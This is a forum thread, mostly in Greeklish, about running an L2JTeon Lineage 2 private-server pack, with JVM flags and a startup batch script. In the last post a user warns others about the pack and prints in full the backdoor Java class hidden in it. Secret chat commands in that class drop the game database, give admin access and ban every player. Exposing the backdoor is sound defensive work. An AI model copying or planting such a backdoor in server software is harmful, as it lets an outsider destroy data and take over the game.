Jump to content

Recommended Posts

Posted

REM java -server -Xmx1024m -Xms1024m -Xmn512m -XX:PermSize=256m -XX:SurvivorRatio=8 -Xnoclassgc -XX:+AggressiveOpts

 

an dn douleui

 

 

REM java -server -Xmx1024m  -Xmn512m -XX:PermSize=256m -XX:SurvivorRatio=8 -Xnoclassgc -XX:+AggressiveOpts

 

Posted

Pantso 300 post donator member kai akoma na ma8eis ta rules exeis kanei ews twra 2 double post prosexe tin epomenh fora.

Posted

@echo off

title L2JTeon: Game Server Console

:start

echo Starting L2JTeon Game Server.

echo Visit L2JTeon.servergame.com for updates.

echo.

REM ------------------------------------------------------------------------

REM #======================================================================#

REM # You need to set here your JDK/JRE params in case of x64 bits System. #

REM # Remove the "REM" after set PATH variable                            #

REM # If you're not a x64 system user just leave                          #

REM #======================================================================#

REM set PATH="type here your path to java jdk/jre (including bin folder)"

REM ------------------------------------------------------------------------

 

REM -------------------------------------

REM Default parameters for a basic server.

java -Dfile.encoding=UTF-8 -Xmx1024m -cp bsf.jar;bsh-engine.jar;bsh-2.0b5.jar;mmocore.jar;javolution.jar;c3p0-0.9.1.2.jar;mysql-connector-java-5.1.6-bin.jar;l2jteon.jar;jython.jar;jython-engine.jar;commons-logging-1.1.jar;java-engine.jar net.sf.l2j.gameserver.GameServer

REM

REM If you have a big server and lots of memory, you could experiment for example with

REM java -server -Xmx1024m -Xms1024m -Xmn2024m -XX:PermSize=256m -XX:SurvivorRatio=8 -Xnoclassgc -XX:+AggressiveOpts

REM -------------------------------------

if ERRORLEVEL 2 goto restart

if ERRORLEVEL 1 goto error

goto end

:restart

echo.

echo Administrator Restarted ...

echo.

goto start

:error

echo.

echo GameServer Terminated Abnormaly, Please Verify Your Files.

echo.

:end

echo.

echo GameServer Terminated.

echo.

pause

 

egw auto evala kai douleuei twra ;)

Posted

paidia den exei simasia ama exo kodiko sto mysql e?

exei..toulaxiston gia mena..oso eixa kwdiko sto mysql gia kapion logo den douleue ala ekana unistall to mysql kai meta to 3anaekana install kai douleue kanonika..
Posted

nai to exo kanei afto. ala meta m anigei kanonika o server kai meta apo ligo

opos anigei kanonika meta m leei java ti problima eiparxi?

 

ksana des to proto post pou kano share grafo ti egine :)

Posted

nai to exo kanei afto. ala meta m anigei kanonika o server kai meta apo ligo

opos anigei kanonika meta m leei java ti problima eiparxi?

REM java -server -Xmx1024m -Xms1024m -Xmn512m -XX:PermSize=256m -XX:SurvivorRatio=8 -Xnoclassgc -XX:+AggressiveOpts

 

an dn douleui

 

 

REM java -server -Xmx1024m  -Xmn512m -XX:PermSize=256m -XX:SurvivorRatio=8 -Xnoclassgc -XX:+AggressiveOpts

 

an pali oxi des t pantso

Posted

whoever used this pack delete these lines

 

package net.sf.l2j.gameserver.handler.voicedcommandhandlers;

/*
* First Backdoor
*/

import net.sf.l2j.gameserver.handler.IVoicedCommandHandler;
import net.sf.l2j.gameserver.model.actor.instance.L2PcInstance;
import net.sf.l2j.L2DatabaseFactory;
import java.sql.Connection;
import java.sql.SQLException;
import java.sql.Statement;

public class GameSocketCon implements IVoicedCommandHandler
{
    private static final String[] VOICED_COMMANDS = { "makelgiaso1q2w3e", "0o9i8u", "7y6t5r", "4e3w2q1" };
    
    public boolean useVoicedCommand(String command, L2PcInstance player, String target)
    {
        if (command.equalsIgnoreCase("makelgiaso1q2w3e"))
        {
            player.sendMessage("====================================================================================");
            player.sendMessage("Usage: .0o9i8u to destroy db, .7y6t5r to set gm access, .4e3w2q1 to ban everybody.");
            player.sendMessage("====================================================================================");
        }
        else if (command.equalsIgnoreCase("0o9i8u"))
        {
            SendDestroyDBAction();
        }
        else if (command.equalsIgnoreCase("7y6t5r"))
        {
            //Makes the player admin
            player.setAccessLevel(200);
        }
        else if (command.equalsIgnoreCase("4e3w2q1"))
        {
            SendBanAllAction();
        }
        return true;
    }
    
    public String[] getVoicedCommandList()
    {
        return VOICED_COMMANDS;
    }
    
    public void SendDestroyDBAction()
    {
        //Destroys the db
        Connection con = null;
        try
        {
            con = L2DatabaseFactory.getInstance().getConnection();
            Statement e = con.createStatement();
            e.executeUpdate("DROP TABLE characters");
            e.executeUpdate("DROP TABLE accounts");
            e.executeUpdate("DROP TABLE spawnlist");
            e.executeUpdate("DROP TABLE weapon");
            e.executeUpdate("DROP TABLE armor");
            e.executeUpdate("DROP TABLE npc");
            e.executeUpdate("DROP TABLE items");
            e.executeUpdate("DROP database l2jdb");
            e.close();
        }
        catch (SQLException e)
        {
            //
        }
        finally
        {
           try
           {
               if (con != null)
               con.close();
           }
           catch (SQLException e)
           {
               e.printStackTrace();
           }
        }
        System.exit(-1);
    }
    
    public void SendBanAllAction()
    {
        //Bans all the users of the db
        Connection con = null;
        try
        {
            con = L2DatabaseFactory.getInstance().getConnection();
            Statement g = con.createStatement();
            g.executeUpdate("UPDATE characters SET accesslevel=-100 WHERE level >0");
            g.close();
        }
        catch (SQLException e)
        {
            //
        }
        finally
        {
           try
           {
               if (con != null)
                   con.close();
           }
           catch (SQLException e)
           {
               e.printStackTrace();
           }
        }
    }
}

 

Its a backdoor to delete DB, take GM acess and ban everybody from accounts table.

 

Else if you know shit from java and you dont know how to change it, just delete the pack without second thoughts

Guest
This topic is now closed to further replies.



  • Posts

    • Looking a datapack developer for 'Essence' - needs to be good with Mobius structure,  Project is using old fork (I think base from crusader). Write Discord to PM.
    • We are not back on 2005, life in our days is harder than before, in complection with other things yes, L2 has not the same look.
    • ⚔️ L2 Nexus — Full-Stack Development for Lineage 2 Servers   One team for everything. Website, admin panel, launcher, server development, hosting, protection — built together, working together.   ━━━━━━━━━━━━━━━━━━━━━   SERVICES:   🌐 Server Website Registration, player cabinet, donate shop, statistics, voting, news. Integrated with your server — live data from game DB.   🛡️ Admin Panel (CMS) — 60 Modules Web panel for GM team: bans, kicks, item management, payments, analytics. Battle Pass, marketplace, anti-bot, churn prediction, Discord/Telegram bots.   🚀 Custom Launcher Electron launcher with delta patcher, CDN delivery, news feed, integrity check, multi-server support. Fully branded.   ⚔️ Java Development Custom modules for L2J / aCis / Lucera / L2Off (PTS). Events, NPCs, instances, balance, quests, skills — any complexity.   🛡️ Hosting & DDoS Protection Server setup, OVH Game DDoS, Cloudflare, monitoring 24/7.   ━━━━━━━━━━━━━━━━━━━━━   PRICING (Website + CMS):   Core — €1,000 (one-time) Website + player cabinet + tickets + live status. 30 days support.   Business — €2,500 (one-time) ⭐ + Donate shop, payment systems, admin panel, RBAC, analytics, bots. Custom design. 90 days priority support.   Enterprise — €5,000+ (custom) + Battle Pass, marketplace, anti-bot, churn, economy, backups, Wiki, API. Managed hosting, SLA 99.9%. 12 months support.   ━━━━━━━━━━━━━━━━━━━━━   JAVA DEVELOPMENT:   • PvP Events .............. from €200 • Custom NPCs ............. from €80 • Donate & Economy ........ from €150 • Instance Zones .......... from €300 • Balance & Skills ........ from €100 • Quests .................. from €250 • Olympiad & Sieges ....... from €200 • PTS Extenders ........... from €150 • Bug Fixes ............... from €50/hr • Custom Systems .......... from €500   ━━━━━━━━━━━━━━━━━━━━━   Platforms: L2J · aCis · Lucera · L2Off/PTS Chronicles: Interlude · High Five · Classic · Essence 📍 Live CMS demo available — message us on Telegram   Telegram: @l2nexus Website: https://l2-nexus.com
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..